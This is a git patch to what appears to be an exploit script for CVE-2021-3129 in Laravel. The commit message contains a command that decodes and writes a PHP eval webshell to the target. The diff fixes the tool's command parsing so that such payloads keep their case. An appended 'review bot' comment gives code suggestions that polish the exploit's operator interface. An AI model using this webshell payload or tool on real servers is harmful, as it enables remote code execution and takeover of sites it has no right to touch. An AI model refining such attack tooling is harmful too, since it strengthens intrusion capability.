From 4d7d2128a45157e62e3ff4c4e10b2eb1a2f9b804 Mon Sep 17 00:00:00 2001
From: Crilwa <91417969+cri1wa@users.noreply.github.com>
Date: Tue, 21 Mar 2023 17:24:17 +0800
Subject: [PATCH] fix:The problem of input character case
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Command execution cannot handle uppercase characters and cannot write to a webshell with uppercase characters,例如,”execute echo PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== | base64 -d > shell1234.php“
---
 CVE-2021-3129.py | 24 ++++++++++++++----------
 1 file changed, 14 insertions(+), 10 deletions(-)
diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
index d274905..657d9f1 100644
--- a/CVE-2021-3129.py
+++ b/CVE-2021-3129.py
@@ -70,20 +70,24 @@ def start(self):
 def ask_command(self):
 response = input(f"{PURPLE}[?] Please enter a command to execute: {END}")
-
- response = response.lower()
- if response == "?" or response == "help": # Return list of commands
+ response_list = response.split(" ",1)
+ command = response_list[0].lower()
+ if(len(response_list) == 2):
+ payload = response_list[1]
+ else:
+ payload = "null"
+ if command == "?" or command == "help": # Return list of commands
 self.cmd_help()
- elif response == "exit": # Stop script
+ elif command == "exit": # Stop script
 exit()
- elif response == "clear_logs": # Attempt to clear laravel.log of target
+ elif command == "clear_logs": # Attempt to clear laravel.log of target
 self.cmd_clear_logs()
- elif response[0:7] == "execute": # Attempt to execute system command on target
- self.cmd_execute_cmd(response[8:])
- elif response[0:5] == "write": # Attempt to write to the log file of target
- self.cmd_execute_write(response[6:])
+ elif command == "execute": # Attempt to execute system command on target
+ self.cmd_execute_cmd(payload)
+ elif command == "write": # Attempt to write to the log file of target
+ self.cmd_execute_write(payload)
 else:
- print(RED + f"[!] No command found named \"{response}\".")
+ print(RED + f"[!] No command found named \"{command}\".")
 self.ask_command()
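Review bot: The `payload = "null"` fallback in ask_command means a bare `execute` or `write` hands the literal string "null" to cmd_execute_cmd / cmd_execute_write instead of being rejected, so an operator typo turns into an unintended action. A missing argument should be represented as `None` and answered with a usage message before either handler is called. Separately, `response.split(" ",1)` treats a leading space as an empty command name and does not split on tabs; stripping first and splitting on any whitespace is more tolerant, provided the empty-input case is guarded before indexing. The parentheses in `if(len(response_list) == 2):` are also unidiomatic for Python.

```python
        response = input(f"{PURPLE}[?] Please enter a command to execute: {END}")
        parts = response.strip().split(maxsplit=1)
        command = parts[0].lower() if parts else ""
        payload = parts[1] if len(parts) == 2 else None
        # … unchanged: help / exit / clear_logs branches …
        elif command in ("execute", "write") and payload is None:
            # Refuse to call the handlers without an explicit argument.
            print(RED + f"[!] \"{command}\" requires an argument.")
        # … unchanged: execute / write / else branches …
```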